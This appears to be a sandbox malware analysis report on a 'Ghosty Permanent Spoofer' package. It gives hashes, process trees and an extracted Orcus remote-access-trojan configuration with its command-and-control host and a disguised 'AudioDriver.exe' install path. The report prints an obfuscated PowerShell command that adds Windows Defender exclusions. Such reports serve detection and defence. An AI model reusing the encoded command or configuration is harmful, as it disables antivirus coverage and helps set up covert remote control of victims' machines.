Overview
overview
10Static
static
3Ghosty Per...FN.exe
windows7-x64
10Ghosty Per...FN.exe
windows10-2004-x64
10Ghosty Per....1.exe
windows7-x64
1Ghosty Per....1.exe
windows10-2004-x64
1Ghosty Per....1.exe
windows7-x64
1Ghosty Per....1.exe
windows10-2004-x64
1Ghosty Per...ry.dll
windows7-x64
5Ghosty Per...ry.dll
windows10-2004-x64
5Ghosty Per...64.dll
windows7-x64
1Ghosty Per...64.dll
windows10-2004-x64
1Ghosty Per...on.dll
windows7-x64
1Ghosty Per...on.dll
windows10-2004-x64
1Ghosty Per...ec.dll
windows7-x64
1Ghosty Per...ec.dll
windows10-2004-x64
1Ghosty Per...z2.dll
windows7-x64
1Ghosty Per...z2.dll
windows10-2004-x64
1Ghosty Per...pe.dll
windows7-x64
1Ghosty Per...pe.dll
windows10-2004-x64
1Ghosty Per...16.dll
windows7-x64
1Ghosty Per...16.dll
windows10-2004-x64
1Ghosty Per...rts.sh
windows7-x64
3Ghosty Per...rts.sh
windows10-2004-x64
3generate-certs.sh
windows7-x64
3generate-certs.sh
windows10-2004-x64
31337/conve...rts.sh
windows7-x64
31337/conve...rts.sh
windows10-2004-x64
3Ghosty Per...or.exe
windows7-x64
1Ghosty Per...or.exe
windows10-2004-x64
1Ghosty Per...64.dll
windows7-x64
1Ghosty Per...64.dll
windows10-2004-x64
1Ghosty Per...64.dll
windows7-x64
1Ghosty Per...64.dll
windows10-2004-x64
1Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
27-12-2024 09:45
Static task
static1
Behavioral task
behavioral1
Sample
Ghosty Permanent Spoofer/GHOSTYFN.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Ghosty Permanent Spoofer/GHOSTYFN.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Ghosty Permanent Spoofer/KA-LicenseKey_x86_x64_v1.1.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Ghosty Permanent Spoofer/KA-LicenseKey_x86_x64_v1.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Ghosty Permanent Spoofer/KA-MemIntegrity_x86_x64_v1.1.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
Ghosty Permanent Spoofer/KA-MemIntegrity_x86_x64_v1.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Ghosty Permanent Spoofer/SafeGuard-Library.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Ghosty Permanent Spoofer/SafeGuard-Library.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Ghosty Permanent Spoofer/VMProtectSDK64.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Ghosty Permanent Spoofer/VMProtectSDK64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Ghosty Permanent Spoofer/brotlicommon.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Ghosty Permanent Spoofer/brotlicommon.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Ghosty Permanent Spoofer/brotlidec.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Ghosty Permanent Spoofer/brotlidec.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Ghosty Permanent Spoofer/bz2.dll
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
Ghosty Permanent Spoofer/bz2.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
Ghosty Permanent Spoofer/freetype.dll
Resource
win7-20241010-en
Behavioral task
behavioral18
Sample
Ghosty Permanent Spoofer/freetype.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
Ghosty Permanent Spoofer/libpng16.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
Ghosty Permanent Spoofer/libpng16.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
Ghosty Permanent Spoofer/server/Certificates/generate-certs.sh
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
Ghosty Permanent Spoofer/server/Certificates/generate-certs.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
generate-certs.sh
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
generate-certs.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
1337/convert/generate-certs.sh
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
1337/convert/generate-certs.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
Ghosty Permanent Spoofer/server/x64/Release/Emulator.exe
Resource
win7-20240708-en
Behavioral task
behavioral28
Sample
Ghosty Permanent Spoofer/server/x64/Release/Emulator.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
Ghosty Permanent Spoofer/server/x64/Release/libcrypto-3-x64.dll
Resource
win7-20241010-en
Behavioral task
behavioral30
Sample
Ghosty Permanent Spoofer/server/x64/Release/libcrypto-3-x64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
Ghosty Permanent Spoofer/server/x64/Release/libssl-3-x64.dll
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
Ghosty Permanent Spoofer/server/x64/Release/libssl-3-x64.dll
Resource
win10v2004-20241007-en
General
-
Target
Ghosty Permanent Spoofer/GHOSTYFN.exe
-
Size
6.1MB
-
MD5
73c7cc676ab19d426f2745ef261d6349
-
SHA1
f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d
-
SHA256
4a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0
-
SHA512
40f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36
-
SSDEEP
98304:BwalpQAdxjrQaMQZZV4g0rvnkVKg9JmcDiCwGDz+Uog9XhhFyoL:JjTrusV4fvuH938Sn9X9t
Malware Config
Extracted
orcus
another-contains.gl.at.ply.gg
a49af69032c94d6fa7c0d2639d32f038
-
administration_rights_required
false
-
anti_debugger
false
-
anti_tcp_analyzer
false
-
antivm
false
-
autostart_method
1
-
change_creation_date
false
-
force_installer_administrator_privileges
false
-
hide_file
false
-
install
false
-
installation_folder
%appdata%\Microsoft\Speech\AudioDriver.exe
-
installservice
false
-
keylogger_enabled
false
-
newcreationdate
12/24/2024 02:03:43
-
plugins
AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==
-
reconnect_delay
10000
-
registry_autostart_keyname
Audio HD Driver
-
registry_hidden_autostart
false
-
set_admin_flag
false
-
tasksch_name
Audio HD Driver
-
tasksch_request_highest_privileges
false
-
try_other_autostart_onfail
false
Signatures
-
Orcus family
-
Executes dropped EXE 3 IoCs
pid Process 2620 GHOSTYFN.exe 1652 spoof.exe 3024 AudioDriver.exe -
Loads dropped DLL 4 IoCs
pid Process 1968 GHOSTYFN.exe 1968 GHOSTYFN.exe 1652 spoof.exe 3024 AudioDriver.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GHOSTYFN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoof.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 2076 powershell.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe 3024 AudioDriver.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 3024 AudioDriver.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1968 wrote to memory of 2076 1968 GHOSTYFN.exe 30 PID 1968 wrote to memory of 2076 1968 GHOSTYFN.exe 30 PID 1968 wrote to memory of 2076 1968 GHOSTYFN.exe 30 PID 1968 wrote to memory of 2076 1968 GHOSTYFN.exe 30 PID 1968 wrote to memory of 2620 1968 GHOSTYFN.exe 32 PID 1968 wrote to memory of 2620 1968 GHOSTYFN.exe 32 PID 1968 wrote to memory of 2620 1968 GHOSTYFN.exe 32 PID 1968 wrote to memory of 2620 1968 GHOSTYFN.exe 32 PID 1968 wrote to memory of 1652 1968 GHOSTYFN.exe 33 PID 1968 wrote to memory of 1652 1968 GHOSTYFN.exe 33 PID 1968 wrote to memory of 1652 1968 GHOSTYFN.exe 33 PID 1968 wrote to memory of 1652 1968 GHOSTYFN.exe 33 PID 1652 wrote to memory of 3024 1652 spoof.exe 34 PID 1652 wrote to memory of 3024 1652 spoof.exe 34 PID 1652 wrote to memory of 3024 1652 spoof.exe 34 PID 1652 wrote to memory of 3024 1652 spoof.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ghosty Permanent Spoofer\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\Ghosty Permanent Spoofer\GHOSTYFN.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"2⤵
- Executes dropped EXE
PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\spoof.exe"C:\Users\Admin\AppData\Local\Temp\spoof.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5d66d5168a0fb7326e23963f4e8502e32
SHA18e5d448ff498a01afc000f9be8a3d5a6591c2a9a
SHA2567d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e
SHA5125a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19
-
Filesize
4.9MB
MD5e65c905174e5f9951a79413833422356
SHA19a8f620da9358e95323548943ca06e6259f44623
SHA256df7e9a74650903532a58491fb925a97114c765d8551b205d5b74cd77b6d0e062
SHA512534f96d756e4584b2e5a441c059ae9456b7e899e1cca3e95ed3a9c65313ceb872575a6e29b38aba57139fe4c8660d31dda9842a6ad1c6f735aa2d93473711465
-
Filesize
626KB
MD5d8aec01ff14e3e7ad43a4b71e30482e4
SHA1e3015f56f17d845ec7eef11d41bbbc28cc16d096
SHA256da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e
SHA512f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf